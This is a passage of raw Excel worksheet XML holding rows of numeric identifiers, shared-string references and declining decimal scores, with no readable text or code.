      </c>
    </row>
    <row r="16545" ht="15.75" customHeight="1">
      <c r="A16545" s="1">
        <v>24057.0</v>
      </c>
      <c r="B16545" s="2">
        <v>9576999.0</v>
      </c>
      <c r="C16545" s="2" t="s">
        <v>15964</v>
      </c>
      <c r="D16545" s="2">
        <v>1.0</v>
      </c>
      <c r="E16545" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16545" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="16546" ht="15.75" customHeight="1">
      <c r="A16546" s="1">
        <v>31737.0</v>
      </c>
      <c r="B16546" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C16546" s="2" t="s">
        <v>15965</v>
      </c>
      <c r="D16546" s="2">
        <v>1.0</v>
      </c>
      <c r="E16546" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16546" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="16547" ht="15.75" customHeight="1">
      <c r="A16547" s="1">
        <v>33104.0</v>
      </c>
      <c r="B16547" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C16547" s="2" t="s">
        <v>15966</v>
      </c>
      <c r="D16547" s="2">
        <v>1.0</v>
      </c>
      <c r="E16547" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16547" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="16548" ht="15.75" customHeight="1">
      <c r="A16548" s="1">
        <v>22892.0</v>
      </c>
      <c r="B16548" s="2">
        <v>4.7883298E7</v>
      </c>
      <c r="C16548" s="2" t="s">
        <v>15967</v>
      </c>
      <c r="D16548" s="2">
        <v>1.0</v>
      </c>
      <c r="E16548" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16548" s="2">
        <v>0.1631393298059965</v>
      </c>
    </row>
    <row r="16549" ht="15.75" customHeight="1">
      <c r="A16549" s="1">
        <v>30382.0</v>
      </c>
      <c r="B16549" s="2">
        <v>3.8537922E7</v>
      </c>
      <c r="C16549" s="2" t="s">
        <v>15968</v>
      </c>
      <c r="D16549" s="2">
        <v>1.0</v>
      </c>
      <c r="E16549" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16549" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="16550" ht="15.75" customHeight="1">
      <c r="A16550" s="1">
        <v>916.0</v>
      </c>
      <c r="B16550" s="2">
        <v>2.2214931E7</v>
      </c>
      <c r="C16550" s="2" t="s">
        <v>15969</v>
      </c>
      <c r="D16550" s="2">
        <v>1.0</v>
      </c>
      <c r="E16550" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16550" s="2">
        <v>0.1627680311890839</v>
      </c>
    </row>
    <row r="16551" ht="15.75" customHeight="1">
      <c r="A16551" s="1">
        <v>15776.0</v>
      </c>
      <c r="B16551" s="2">
        <v>4.4186249E7</v>
      </c>
      <c r="C16551" s="2" t="s">
        <v>15970</v>
      </c>
      <c r="D16551" s="2">
        <v>1.0</v>
      </c>
      <c r="E16551" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16551" s="2">
        <v>0.1626262626262626</v>
      </c>
    </row>
    <row r="16552" ht="15.75" customHeight="1">
      <c r="A16552" s="1">
        <v>33278.0</v>
      </c>
      <c r="B16552" s="2">
        <v>7430209.0</v>
      </c>
      <c r="C16552" s="2" t="s">
        <v>15971</v>
      </c>
      <c r="D16552" s="2">
        <v>1.0</v>
      </c>
      <c r="E16552" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16552" s="2">
        <v>0.1622222222222222</v>
      </c>
    </row>
    <row r="16553" ht="15.75" customHeight="1">
      <c r="A16553" s="1">
        <v>3569.0</v>
      </c>
      <c r="B16553" s="2">
        <v>3.8942149E7</v>
      </c>
      <c r="C16553" s="2" t="s">
        <v>15972</v>
      </c>
      <c r="D16553" s="2">
        <v>1.0</v>
      </c>
      <c r="E16553" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16553" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="16554" ht="15.75" customHeight="1">
      <c r="A16554" s="1">
        <v>14341.0</v>
      </c>
      <c r="B16554" s="2">
        <v>3.8827972E7</v>
      </c>
      <c r="C16554" s="2" t="s">
        <v>15973</v>
      </c>
      <c r="D16554" s="2">
        <v>1.0</v>
      </c>
      <c r="E16554" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16554" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="16555" ht="15.75" customHeight="1">
      <c r="A16555" s="1">
        <v>14367.0</v>
      </c>
      <c r="B16555" s="2">
        <v>3.8960493E7</v>
      </c>
      <c r="C16555" s="2" t="s">
        <v>15974</v>
      </c>
      <c r="D16555" s="2">
        <v>1.0</v>
      </c>
      <c r="E16555" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16555" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="16556" ht="15.75" customHeight="1">
      <c r="A16556" s="1">
        <v>25687.0</v>
      </c>
      <c r="B16556" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16556" s="2" t="s">
        <v>15975</v>
      </c>
      <c r="D16556" s="2">
        <v>1.0</v>
      </c>
      <c r="E16556" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16556" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="16557" ht="15.75" customHeight="1">
      <c r="A16557" s="1">
        <v>19250.0</v>
      </c>
      <c r="B16557" s="2">
        <v>5.5112824E7</v>
      </c>
      <c r="C16557" s="2" t="s">
        <v>15976</v>
      </c>
      <c r="D16557" s="2">
        <v>1.0</v>
      </c>
      <c r="E16557" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16557" s="2">
        <v>0.1621863799283154</v>
      </c>
    </row>
    <row r="16558" ht="15.75" customHeight="1">
      <c r="A16558" s="1">
        <v>17301.0</v>
      </c>
      <c r="B16558" s="2">
        <v>4.9267783E7</v>
      </c>
      <c r="C16558" s="2" t="s">
        <v>15977</v>
      </c>
      <c r="D16558" s="2">
        <v>1.0</v>
      </c>
      <c r="E16558" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16558" s="2">
        <v>0.1618773946360153</v>
      </c>
    </row>
    <row r="16559" ht="15.75" customHeight="1">
      <c r="A16559" s="1">
        <v>31137.0</v>
      </c>
      <c r="B16559" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C16559" s="2" t="s">
        <v>15978</v>
      </c>
      <c r="D16559" s="2">
        <v>1.0</v>
      </c>
      <c r="E16559" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16559" s="2">
        <v>0.1618357487922706</v>
      </c>
    </row>
    <row r="16560" ht="15.75" customHeight="1">
      <c r="A16560" s="1">
        <v>16196.0</v>
      </c>
      <c r="B16560" s="2">
        <v>4.5661419E7</v>
      </c>
      <c r="C16560" s="2" t="s">
        <v>15979</v>
      </c>
      <c r="D16560" s="2">
        <v>1.0</v>
      </c>
      <c r="E16560" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16560" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="16561" ht="15.75" customHeight="1">
      <c r="A16561" s="1">
        <v>28913.0</v>
      </c>
      <c r="B16561" s="2">
        <v>2.9444261E7</v>
      </c>
      <c r="C16561" s="2" t="s">
        <v>15980</v>
      </c>
      <c r="D16561" s="2">
        <v>1.0</v>
      </c>
      <c r="E16561" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16561" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="16562" ht="15.75" customHeight="1">
      <c r="A16562" s="1">
        <v>34044.0</v>
      </c>
      <c r="B16562" s="2">
        <v>9576998.0</v>
      </c>
      <c r="C16562" s="2" t="s">
        <v>15981</v>
      </c>
      <c r="D16562" s="2">
        <v>1.0</v>
      </c>
      <c r="E16562" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16562" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="16563" ht="15.75" customHeight="1">
      <c r="A16563" s="1">
        <v>24390.0</v>
      </c>
      <c r="B16563" s="2">
        <v>1.0783157E7</v>
      </c>
      <c r="C16563" s="2" t="s">
        <v>15982</v>
      </c>
      <c r="D16563" s="2">
        <v>1.0</v>
      </c>
      <c r="E16563" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16563" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="16564" ht="15.75" customHeight="1">
      <c r="A16564" s="1">
        <v>33033.0</v>
      </c>
      <c r="B16564" s="2">
        <v>6715799.0</v>
      </c>
      <c r="C16564" s="2" t="s">
        <v>15983</v>
      </c>
      <c r="D16564" s="2">
        <v>1.0</v>
      </c>
      <c r="E16564" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16564" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="16565" ht="15.75" customHeight="1">
      <c r="A16565" s="1">
        <v>15905.0</v>
      </c>
      <c r="B16565" s="2">
        <v>4.4628444E7</v>
      </c>
      <c r="C16565" s="5" t="s">
        <v>15984</v>
      </c>
      <c r="D16565" s="2">
        <v>1.0</v>
      </c>
      <c r="E16565" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16565" s="2">
        <v>0.1610169491525424</v>
      </c>
    </row>
    <row r="16566" ht="15.75" customHeight="1">
      <c r="A16566" s="1">
        <v>7112.0</v>
      </c>
      <c r="B16566" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C16566" s="2" t="s">
        <v>15985</v>
      </c>
      <c r="D16566" s="2">
        <v>1.0</v>
      </c>
      <c r="E16566" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16566" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16567" ht="15.75" customHeight="1">
      <c r="A16567" s="1">
        <v>13787.0</v>
      </c>
      <c r="B16567" s="2">
        <v>3656782.0</v>
      </c>
      <c r="C16567" s="2" t="s">
        <v>15986</v>
      </c>
      <c r="D16567" s="2">
        <v>1.0</v>
      </c>
      <c r="E16567" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16567" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16568" ht="15.75" customHeight="1">
      <c r="A16568" s="1">
        <v>14039.0</v>
      </c>
      <c r="B16568" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C16568" s="2" t="s">
        <v>15987</v>
      </c>
      <c r="D16568" s="2">
        <v>1.0</v>
      </c>
      <c r="E16568" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16568" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16569" ht="15.75" customHeight="1">
      <c r="A16569" s="1">
        <v>19183.0</v>
      </c>
      <c r="B16569" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C16569" s="2" t="s">
        <v>15988</v>
      </c>
      <c r="D16569" s="2">
        <v>1.0</v>
      </c>
      <c r="E16569" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16569" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16570" ht="15.75" customHeight="1">
      <c r="A16570" s="1">
        <v>21489.0</v>
      </c>
      <c r="B16570" s="2">
        <v>2.3059043E7</v>
      </c>
      <c r="C16570" s="2" t="s">
        <v>15989</v>
      </c>
      <c r="D16570" s="2">
        <v>1.0</v>
      </c>
      <c r="E16570" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16570" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16571" ht="15.75" customHeight="1">
      <c r="A16571" s="1">
        <v>22948.0</v>
      </c>
      <c r="B16571" s="2">
        <v>4889825.0</v>
      </c>
      <c r="C16571" s="2" t="s">
        <v>15990</v>
      </c>
      <c r="D16571" s="2">
        <v>1.0</v>
      </c>
      <c r="E16571" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16571" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16572" ht="15.75" customHeight="1">
      <c r="A16572" s="1">
        <v>23232.0</v>
      </c>
      <c r="B16572" s="2">
        <v>5289322.0</v>
      </c>
      <c r="C16572" s="2" t="s">
        <v>15991</v>
      </c>
      <c r="D16572" s="2">
        <v>1.0</v>
      </c>
      <c r="E16572" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16572" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16573" ht="15.75" customHeight="1">
      <c r="A16573" s="1">
        <v>26077.0</v>
      </c>
      <c r="B16573" s="2">
        <v>1.5630422E7</v>
      </c>
      <c r="C16573" s="2" t="s">
        <v>15992</v>
      </c>
      <c r="D16573" s="2">
        <v>1.0</v>
      </c>
      <c r="E16573" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16573" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16574" ht="15.75" customHeight="1">
      <c r="A16574" s="1">
        <v>33531.0</v>
      </c>
      <c r="B16574" s="2">
        <v>8137495.0</v>
      </c>
      <c r="C16574" s="2" t="s">
        <v>15993</v>
      </c>
      <c r="D16574" s="2">
        <v>1.0</v>
      </c>
      <c r="E16574" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16574" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="16575" ht="15.75" customHeight="1">
      <c r="A16575" s="1">
        <v>21148.0</v>
      </c>
      <c r="B16575" s="2">
        <v>1.8740437E7</v>
      </c>
      <c r="C16575" s="2" t="s">
        <v>15989</v>
      </c>
      <c r="D16575" s="2">
        <v>1.0</v>
      </c>
      <c r="E16575" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16575" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="16576" ht="15.75" customHeight="1">
      <c r="A16576" s="1">
        <v>26811.0</v>
      </c>
      <c r="B16576" s="2">
        <v>1.8740436E7</v>
      </c>
      <c r="C16576" s="2" t="s">
        <v>15989</v>
      </c>
      <c r="D16576" s="2">
        <v>1.0</v>
      </c>
      <c r="E16576" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16576" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="16577" ht="15.75" customHeight="1">
      <c r="A16577" s="1">
        <v>27712.0</v>
      </c>
      <c r="B16577" s="2">
        <v>2.3059042E7</v>
      </c>
      <c r="C16577" s="2" t="s">
        <v>15989</v>
      </c>
      <c r="D16577" s="2">
        <v>1.0</v>
      </c>
      <c r="E16577" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16577" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="16578" ht="15.75" customHeight="1">
      <c r="A16578" s="1">
        <v>31891.0</v>
      </c>
      <c r="B16578" s="2">
        <v>5289321.0</v>
      </c>
      <c r="C16578" s="2" t="s">
        <v>15991</v>
      </c>
      <c r="D16578" s="2">
        <v>1.0</v>
      </c>
      <c r="E16578" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16578" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="16579" ht="15.75" customHeight="1">
      <c r="A16579" s="1">
        <v>14839.0</v>
      </c>
      <c r="B16579" s="2">
        <v>4.1034048E7</v>
      </c>
      <c r="C16579" s="2" t="s">
        <v>15994</v>
      </c>
      <c r="D16579" s="2">
        <v>1.0</v>
      </c>
      <c r="E16579" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16579" s="2">
        <v>0.1605783866057839</v>
      </c>
    </row>
    <row r="16580" ht="15.75" customHeight="1">
      <c r="A16580" s="1">
        <v>6790.0</v>
      </c>
      <c r="B16580" s="2">
        <v>4.9500361E7</v>
      </c>
      <c r="C16580" s="2" t="s">
        <v>15995</v>
      </c>
      <c r="D16580" s="2">
        <v>1.0</v>
      </c>
      <c r="E16580" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16580" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="16581" ht="15.75" customHeight="1">
      <c r="A16581" s="1">
        <v>10226.0</v>
      </c>
      <c r="B16581" s="2">
        <v>5.7482511E7</v>
      </c>
      <c r="C16581" s="2" t="s">
        <v>15996</v>
      </c>
      <c r="D16581" s="2">
        <v>1.0</v>
      </c>
      <c r="E16581" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16581" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="16582" ht="15.75" customHeight="1">
      <c r="A16582" s="1">
        <v>21990.0</v>
      </c>
      <c r="B16582" s="2">
        <v>2.9445959E7</v>
      </c>
      <c r="C16582" s="2" t="s">
        <v>15997</v>
      </c>
      <c r="D16582" s="2">
        <v>1.0</v>
      </c>
      <c r="E16582" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16582" s="2">
        <v>0.1599616858237548</v>
      </c>
    </row>
    <row r="16583" ht="15.75" customHeight="1">
      <c r="A16583" s="1">
        <v>30914.0</v>
      </c>
      <c r="B16583" s="2">
        <v>4.6779818E7</v>
      </c>
      <c r="C16583" s="2" t="s">
        <v>15998</v>
      </c>
      <c r="D16583" s="2">
        <v>1.0</v>
      </c>
      <c r="E16583" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16583" s="2">
        <v>0.1598290598290599</v>
      </c>
    </row>
    <row r="16584" ht="15.75" customHeight="1">
      <c r="A16584" s="1">
        <v>33286.0</v>
      </c>
      <c r="B16584" s="2">
        <v>7454535.0</v>
      </c>
      <c r="C16584" s="2" t="s">
        <v>15999</v>
      </c>
      <c r="D16584" s="2">
        <v>1.0</v>
      </c>
      <c r="E16584" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16584" s="2">
        <v>0.1596119929453264</v>
      </c>
    </row>
    <row r="16585" ht="15.75" customHeight="1">
      <c r="A16585" s="1">
        <v>28634.0</v>
      </c>
      <c r="B16585" s="2">
        <v>2.7267903E7</v>
      </c>
      <c r="C16585" s="2" t="s">
        <v>16000</v>
      </c>
      <c r="D16585" s="2">
        <v>1.0</v>
      </c>
      <c r="E16585" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16585" s="2">
        <v>0.1596119929453263</v>
      </c>
    </row>
    <row r="16586" ht="15.75" customHeight="1">
      <c r="A16586" s="1">
        <v>7514.0</v>
      </c>
      <c r="B16586" s="2">
        <v>5.1404468E7</v>
      </c>
      <c r="C16586" s="2" t="s">
        <v>16001</v>
      </c>
      <c r="D16586" s="2">
        <v>1.0</v>
      </c>
      <c r="E16586" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16586" s="2">
        <v>0.1593806921675774</v>
      </c>
    </row>
    <row r="16587" ht="15.75" customHeight="1">
      <c r="A16587" s="1">
        <v>26812.0</v>
      </c>
      <c r="B16587" s="2">
        <v>1.8740436E7</v>
      </c>
      <c r="C16587" s="2" t="s">
        <v>16002</v>
      </c>
      <c r="D16587" s="2">
        <v>1.0</v>
      </c>
      <c r="E16587" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16587" s="2">
        <v>0.1593137254901961</v>
      </c>
    </row>
    <row r="16588" ht="15.75" customHeight="1">
      <c r="A16588" s="1">
        <v>13924.0</v>
      </c>
      <c r="B16588" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C16588" s="2" t="s">
        <v>16003</v>
      </c>
      <c r="D16588" s="2">
        <v>1.0</v>
      </c>
      <c r="E16588" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16588" s="2">
        <v>0.1591337099811677</v>
      </c>
    </row>
    <row r="16589" ht="15.75" customHeight="1">
      <c r="A16589" s="1">
        <v>23793.0</v>
      </c>
      <c r="B16589" s="2">
        <v>7730805.0</v>
      </c>
      <c r="C16589" s="2" t="s">
        <v>16004</v>
      </c>
      <c r="D16589" s="2">
        <v>1.0</v>
      </c>
      <c r="E16589" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16589" s="2">
        <v>0.1591337099811676</v>
      </c>
    </row>
    <row r="16590" ht="15.75" customHeight="1">
      <c r="A16590" s="1">
        <v>1492.0</v>
      </c>
      <c r="B16590" s="2">
        <v>2.7199828E7</v>
      </c>
      <c r="C16590" s="2" t="s">
        <v>16005</v>
      </c>
      <c r="D16590" s="2">
        <v>1.0</v>
      </c>
      <c r="E16590" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16590" s="2">
        <v>0.1590909090909091</v>
      </c>
    </row>
    <row r="16591" ht="15.75" customHeight="1">
      <c r="A16591" s="1">
        <v>28478.0</v>
      </c>
      <c r="B16591" s="2">
        <v>2.6636948E7</v>
      </c>
      <c r="C16591" s="2" t="s">
        <v>16006</v>
      </c>
      <c r="D16591" s="2">
        <v>1.0</v>
      </c>
      <c r="E16591" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16591" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="16592" ht="15.75" customHeight="1">
      <c r="A16592" s="1">
        <v>30885.0</v>
      </c>
      <c r="B16592" s="2">
        <v>4.648182E7</v>
      </c>
      <c r="C16592" s="2" t="s">
        <v>16007</v>
      </c>
      <c r="D16592" s="2">
        <v>1.0</v>
      </c>
      <c r="E16592" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16592" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="16593" ht="15.75" customHeight="1">
      <c r="A16593" s="1">
        <v>32210.0</v>
      </c>
      <c r="B16593" s="2">
        <v>5.4840879E7</v>
      </c>
      <c r="C16593" s="2" t="s">
        <v>16008</v>
      </c>
      <c r="D16593" s="2">
        <v>1.0</v>
      </c>
      <c r="E16593" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16593" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="16594" ht="15.75" customHeight="1">
      <c r="A16594" s="1">
        <v>18833.0</v>
      </c>
      <c r="B16594" s="2">
        <v>5.3940684E7</v>
      </c>
      <c r="C16594" s="2" t="s">
        <v>16009</v>
      </c>
      <c r="D16594" s="2">
        <v>1.0</v>
      </c>
      <c r="E16594" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16594" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="16595" ht="15.75" customHeight="1">
      <c r="A16595" s="1">
        <v>24300.0</v>
      </c>
      <c r="B16595" s="2">
        <v>1.0561467E7</v>
      </c>
      <c r="C16595" s="2" t="s">
        <v>16010</v>
      </c>
      <c r="D16595" s="2">
        <v>1.0</v>
      </c>
      <c r="E16595" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16595" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="16596" ht="15.75" customHeight="1">
      <c r="A16596" s="1">
        <v>32504.0</v>
      </c>
      <c r="B16596" s="2">
        <v>5713783.0</v>
      </c>
      <c r="C16596" s="2" t="s">
        <v>16011</v>
      </c>
      <c r="D16596" s="2">
        <v>1.0</v>
      </c>
      <c r="E16596" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16596" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="16597" ht="15.75" customHeight="1">
      <c r="A16597" s="1">
        <v>33335.0</v>
      </c>
      <c r="B16597" s="2">
        <v>7587793.0</v>
      </c>
      <c r="C16597" s="2" t="s">
        <v>16012</v>
      </c>
      <c r="D16597" s="2">
        <v>1.0</v>
      </c>
      <c r="E16597" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16597" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="16598" ht="15.75" customHeight="1">
      <c r="A16598" s="1">
        <v>31136.0</v>
      </c>
      <c r="B16598" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C16598" s="2" t="s">
        <v>16013</v>
      </c>
      <c r="D16598" s="2">
        <v>1.0</v>
      </c>
      <c r="E16598" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16598" s="2">
        <v>0.1586021505376345</v>
      </c>
    </row>
    <row r="16599" ht="15.75" customHeight="1">
      <c r="A16599" s="1">
        <v>18818.0</v>
      </c>
      <c r="B16599" s="2">
        <v>5.3919883E7</v>
      </c>
      <c r="C16599" s="2" t="s">
        <v>16014</v>
      </c>
      <c r="D16599" s="2">
        <v>1.0</v>
      </c>
      <c r="E16599" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16599" s="2">
        <v>0.1585858585858586</v>
      </c>
    </row>
    <row r="16600" ht="15.75" customHeight="1">
      <c r="A16600" s="1">
        <v>33337.0</v>
      </c>
      <c r="B16600" s="2">
        <v>7587793.0</v>
      </c>
      <c r="C16600" s="2" t="s">
        <v>16015</v>
      </c>
      <c r="D16600" s="2">
        <v>1.0</v>
      </c>
      <c r="E16600" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16600" s="2">
        <v>0.1583333333333334</v>
      </c>
    </row>
    <row r="16601" ht="15.75" customHeight="1">
      <c r="A16601" s="1">
        <v>47.0</v>
      </c>
      <c r="B16601" s="2">
        <v>1.0864668E7</v>
      </c>
      <c r="C16601" s="2" t="s">
        <v>16016</v>
      </c>
      <c r="D16601" s="2">
        <v>1.0</v>
      </c>
      <c r="E16601" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16601" s="2">
        <v>0.1583333333333333</v>
      </c>
    </row>
    <row r="16602" ht="15.75" customHeight="1">
      <c r="A16602" s="1">
        <v>32428.0</v>
      </c>
      <c r="B16602" s="2">
        <v>5649844.0</v>
      </c>
      <c r="C16602" s="2" t="s">
        <v>16017</v>
      </c>
      <c r="D16602" s="2">
        <v>1.0</v>
      </c>
      <c r="E16602" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16602" s="2">
        <v>0.1583333333333333</v>
      </c>
    </row>
    <row r="16603" ht="15.75" customHeight="1">
      <c r="A16603" s="1">
        <v>34177.0</v>
      </c>
      <c r="B16603" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C16603" s="2" t="s">
        <v>16018</v>
      </c>
      <c r="D16603" s="2">
        <v>1.0</v>
      </c>
      <c r="E16603" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16603" s="2">
        <v>0.1583333333333333</v>
      </c>
    </row>
    <row r="16604" ht="15.75" customHeight="1">
      <c r="A16604" s="1">
        <v>1332.0</v>
      </c>
      <c r="B16604" s="2">
        <v>2.5831884E7</v>
      </c>
      <c r="C16604" s="2" t="s">
        <v>16019</v>
      </c>
      <c r="D16604" s="2">
        <v>1.0</v>
      </c>
      <c r="E16604" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16604" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16605" ht="15.75" customHeight="1">
      <c r="A16605" s="1">
        <v>6793.0</v>
      </c>
      <c r="B16605" s="2">
        <v>4.9500361E7</v>
      </c>
      <c r="C16605" s="2" t="s">
        <v>16020</v>
      </c>
      <c r="D16605" s="2">
        <v>1.0</v>
      </c>
      <c r="E16605" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16605" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16606" ht="15.75" customHeight="1">
      <c r="A16606" s="1">
        <v>11181.0</v>
      </c>
      <c r="B16606" s="2">
        <v>1.9756782E7</v>
      </c>
      <c r="C16606" s="2" t="s">
        <v>16021</v>
      </c>
      <c r="D16606" s="2">
        <v>1.0</v>
      </c>
      <c r="E16606" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16606" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16607" ht="15.75" customHeight="1">
      <c r="A16607" s="1">
        <v>11182.0</v>
      </c>
      <c r="B16607" s="2">
        <v>1.9756782E7</v>
      </c>
      <c r="C16607" s="2" t="s">
        <v>16022</v>
      </c>
      <c r="D16607" s="2">
        <v>1.0</v>
      </c>
      <c r="E16607" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16607" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16608" ht="15.75" customHeight="1">
      <c r="A16608" s="1">
        <v>12362.0</v>
      </c>
      <c r="B16608" s="2">
        <v>2.8751311E7</v>
      </c>
      <c r="C16608" s="2" t="s">
        <v>16023</v>
      </c>
      <c r="D16608" s="2">
        <v>1.0</v>
      </c>
      <c r="E16608" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16608" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16609" ht="15.75" customHeight="1">
      <c r="A16609" s="1">
        <v>19292.0</v>
      </c>
      <c r="B16609" s="2">
        <v>5.5180719E7</v>
      </c>
      <c r="C16609" s="2" t="s">
        <v>16024</v>
      </c>
      <c r="D16609" s="2">
        <v>1.0</v>
      </c>
      <c r="E16609" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16609" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16610" ht="15.75" customHeight="1">
      <c r="A16610" s="1">
        <v>20141.0</v>
      </c>
      <c r="B16610" s="2">
        <v>1.015569E7</v>
      </c>
      <c r="C16610" s="2" t="s">
        <v>16025</v>
      </c>
      <c r="D16610" s="2">
        <v>1.0</v>
      </c>
      <c r="E16610" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16610" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16611" ht="15.75" customHeight="1">
      <c r="A16611" s="1">
        <v>21940.0</v>
      </c>
      <c r="B16611" s="2">
        <v>2.867669E7</v>
      </c>
      <c r="C16611" s="2" t="s">
        <v>16026</v>
      </c>
      <c r="D16611" s="2">
        <v>1.0</v>
      </c>
      <c r="E16611" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16611" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="16612" ht="15.75" customHeight="1">
